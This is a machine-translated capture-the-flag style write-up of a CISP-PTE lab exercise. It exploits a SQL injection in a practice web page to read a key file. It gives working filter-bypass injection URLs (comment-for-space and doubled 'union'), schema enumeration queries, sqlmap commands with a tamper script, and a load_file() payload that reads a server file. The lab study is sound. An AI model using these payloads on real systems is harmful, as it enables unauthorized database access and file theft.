SQL injection question type (manual injection +sqlmap)

subject ： adopt SQL Injection vulnerability read /tmp/360/key file , The answer is in the file

Catalog

subject ： adopt SQL Injection vulnerability read /tmp/360/key file , The answer is in the file

First, carry out manual injection （ use ’ as well as and perhaps or To check whether manual injection can be performed ）

use sqlmap Tool injection :(-u Specify injected site links ,--tamper Specify to prevent filtering of key characters , Such as spaces 、union)

Found no data to find , Return to the topic ： adopt SQL Injection vulnerability read /tmp/360/key file , The answer is in the file .

First of all to Manual injection （ use ’ as well as and perhaps or To check whether manual injection can be performed ）

You can see id=1 Echo page for , Combined with the echo statement, it is found that the page is shielded union、<?php?>、 Space

therefore ：

1. use /**/ To display spaces
2. use union Double writing bypasses

Input url：http://192.168.129.128:81/vulnerabilities/fu1.php?id=1')#

The execution statement is ：select * from article where id= ('1')#')

Go to order by Check field 、 The judgment is only 4 A field

http://192.168.129.128:81/vulnerabilities/fu1.php?id=1')/**/order/**/by/**/4#

Show echo page

http://192.168.129.128:81/vulnerabilities/fu1.php?id=1')/**/order/**/by/**/5#

Do not display the echo page

And then use union Joint injection query ：

http://192.168.129.128:81/vulnerabilities/fu1.php?id=-1')/**/uniunionon/**/select/**/1,2,3,4#

Perform explosion table, explosion library and field ：（group_concat() function ： Display the field contents of the branch as one line ）

1、select group_concat(table_name) from information_schema.tables where table_schema=database()

• Name of Pop Watch ：

http://192.168.129.128:81/vulnerabilities/fu1.php?id=-1%27)/**/uniunionon/**/select/**/1,2,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),4%23

• database ：information_schema
• surface ：tables
• Field ：table_name

2、select group_concat(column_name) from information_schema.columns where table_name=' Table name '

• Pop field ：

http://192.168.129.128:81/vulnerabilities/fu1.php?id=-1%27)/**/uniunionon/**/select/**/1,2,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/column_name=%27article%27),4%23

• database ：infomation_schema
• surface ：columns
• Field ：column_name

It can be inferred that ：

1. Current database `2web`
2. Current table article
3. article Field has id,title,content,author

use sqlmap Tools For injection :(-u Specify injected site links ,--tamper Specify to prevent filtering of key characters , Such as spaces 、union)

python sqlmap.py -u "http://192.168.129.128:81/vulnerabilities/fu1.php?id=1" --tamper "F:\ Information \CISP-PTE\ tool kit \ Injection tool \sqlmap\tamper\space2comment.py"

The injection type is ：boolean-based blind、time-based blind

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1') AND 1028=1028 AND ('OXUg'='OXUg

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1') AND (SELECT 7895 FROM (SELECT(SLEEP(5)))sSoM) AND ('YhuC'='YhuC
---

List databases ：

python sqlmap.py -u "http://192.168.129.128:81/vulnerabilities/fu1.php?id=1" --tamper "F:\ Information \CISP-PTE\ tool kit \ Injection tool \sqlmap\tamper\space2comment.py" --dbs

List `2web` Tables in the database

python sqlmap.py -u "http://192.168.129.128:81/vulnerabilities/fu1.php?id=1" --tamper "F:\ Information \CISP-PTE\ tool kit \ Injection tool \sqlmap\tamper\space2comment.py" -D `2web` --tables

List `2web` Database article What's in the table ：

python sqlmap.py -u "http://192.168.129.128:81/vulnerabilities/fu1.php?id=1" --tamper "F:\ Information \CISP-PTE\ tool kit \ Injection tool \sqlmap\tamper\space2comment.py" -D `2web` -T article --dump

Found no data to find , Return to the topic ： adopt SQL Inject holes Read /tmp/360/key file , The answer is in the file .

The absolute path of a known file , Go straight ahead load_file() Function to view local files

http://192.168.129.128:81/vulnerabilities/fu1.php?id=-1')/**/uniunionon/**/select/**/1,2,load_file('/tmp/360/key'),4#

Finally found key8 Value